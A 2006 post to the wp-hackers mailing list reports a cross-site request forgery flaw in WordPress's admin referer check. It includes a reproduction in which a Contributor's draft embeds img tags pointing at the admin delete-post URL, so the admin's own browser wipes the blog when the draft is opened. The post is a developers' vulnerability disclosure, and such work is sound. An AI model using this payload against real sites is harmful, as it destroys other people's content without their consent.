[wp-hackers] Rethinking check_admin_referer()
Paul Mitchell
wp-hackers at paul-mitchell.me.uk
Tue Apr 18 09:03:30 GMT 2006
David House wrote:
> Yeah, this is a flaw in the current system. I _think_ nonces would fix
> this, someone else would have to verify that.
>
God Bless the English language and its diversity! Who chose the word
"nonce"? http://www.urbandictionary.com/define.php?term=nonce
Anyway, this "flaw in the current system" is nuclear. It allows a
trivial remotely-exploitable escalation of privilege with ultimate
destructive power.
I ran my test on the latest 2.1-alpha1.
1. New blog.
2. Admin user configures blog to allow anyone to register and the
default user level to Contributor.
3. "Bad Guy" registers.
4. Admin writes a sequence of posts.
5. "Bad Guy" logs in and posts a draft consisting of:
<img
src='http://www.vanishingblog.com/blog/wp-admin/post.php?action=delete&post=1"
/>
<img
src='http://www.vanishingblog.com/blog/wp-admin/post.php?action=delete&post=2"
/>
...
<img
src='http://www.vanishingblog.com/blog/wp-admin/post.php?action=delete&post=999"
/>
6. Admin notices the new draft, opens it in the editor and puzzles over
the broken image links.
7. Admin notices the blog is gone.
My bug report for this flaw would be "In all known versions of
WordPress, anyone trusted to write a draft can also nuke the blog" and I
would classify it "critical security". I'm glad I don't have to fix this
one.
Paul
More information about the wp-hackers
mailing list